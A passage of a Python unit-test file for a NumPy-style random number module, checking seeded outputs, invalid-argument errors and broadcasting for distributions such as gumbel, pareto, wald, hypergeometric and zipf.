assert_raises(ValueError, random.gamma, shape=-0.0, scale=-0.0)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(0.123456789, size=(3, 2))
desired = np.array([[8, 7], [17, 17], [5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.0)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10], [10, 10], [9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.0)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=0.123456789, sigma=2.0, size=(3, 2))
desired = np.array(
[
[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.0)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=0.923456789, size=(3, 2))
desired = np.array([[2, 2], [6, 17], [3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.0] * 6, size=(3, 2))
desired = np.array(
[
[[4, 3, 5, 4, 2, 2], [5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4], [2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3], [4, 3, 4, 2, 3, 4]],
]
)
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (0.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array(
[
[
[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383],
],
[
[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306],
],
[
[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn"t warn with RuntimeWarning check_valid="ignore"
assert_no_warnings(random.multivariate_normal, mean, cov, check_valid="ignore")
# and that it raises with RuntimeWarning check_valid="raises"
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="other"
)
assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=0.12345, size=(3, 2))
desired = np.array([[848, 841], [892, 611], [779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100, [np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array(
[
[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=0.5, nonc=0.2, size=(3, 2))
desired = np.array(
[
[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array(
[
[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1, size=(3, 2))
desired = np.array(
[
[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.0)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=0.123456789, size=(3, 2))
desired = np.array(
[
[2.46852460439034849e03, 1.41286880810518346e03],
[5.28287797029485181e07, 6.57720981047328785e07],
[1.40840323350391515e02, 1.98390255135251704e05],
]
)
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=0.123456789, size=(3, 2))
desired = np.array([[0, 0], [1, 0], [0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo("l").max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=0.123456789, size=(3, 2))
desired = np.array(
[
[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array(
[
[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.0)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array(
[
[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array(
[
[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array(
[
[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.0)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array(
[
[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array(
[
[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34, size=(3, 2))
desired = np.array(
[
[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array(
[
[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo("float").min
fmax = np.finfo("float").max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array(
[
[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=1.1e-8, size=10 ** 6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array(
[
[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array(
[
[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.0)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29], [1, 1], [3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array(
[0.53283302478975902, 0.53413660089041659, 0.50955303552646702]
)
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612, 2.1283977976520019, 1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array(
[0.19843558305989056, 0.075230336409423643, 0.24976865978980844]
)
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array(
[0.76106853658845242, 0.76386282278691653, 0.71243813125891797]
)
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array(
[0.76106853658845242, 0.76386282278691653, 0.71243813125891797]
)
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048, 1.5277256455738331, 1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array(
[0.80038951638264799, 0.86768719635363512, 2.7251095168386801]
)
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211, 13.025456344595602, 8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array(
[0.57022801133088286, 0.51947702108840776, 0.1320969254923558]
)
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763, 4.5804135049718742, 6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643, 5.8560725167361607, 1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array(
[2.9883443664201312, -2.7064099483995943, -1.8672476700665914]
)
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362, 1.1465519762044529, 1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array(
[0.76106853658845242, 0.76386282278691653, 0.71243813125891797]
)
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array(
[0.53283302478975902, 0.53413660089041659, 0.50955303552646702]
)
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array(
[0.067921356028507157, 0.070715642226971326, 0.019290950698972624]
)
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array(
[0.2730318639556768, 0.26936705726291116, 0.33906220393037939]
)
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array(
[0.13152135837586171, 0.13675915696285773, 0.038216792802833396]
)
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427, 8.4013952870126261, 6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689, 1.2360119924878694, 1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array(
[0.11873681120271318, 0.12450084820795027, 0.9096122728408238]
)
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429, 2.0347400359389356, 2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
assert_raises(ValueError, triangular, 10.0, 0.0, 20.0)
assert_raises(ValueError, triangular, 10.0, 25.0, 20.0)
assert_raises(ValueError, triangular, 10.0, 10.0, 10.0)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
self.set_seed()
actual = binom(n * 3, p, size=(3,))
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
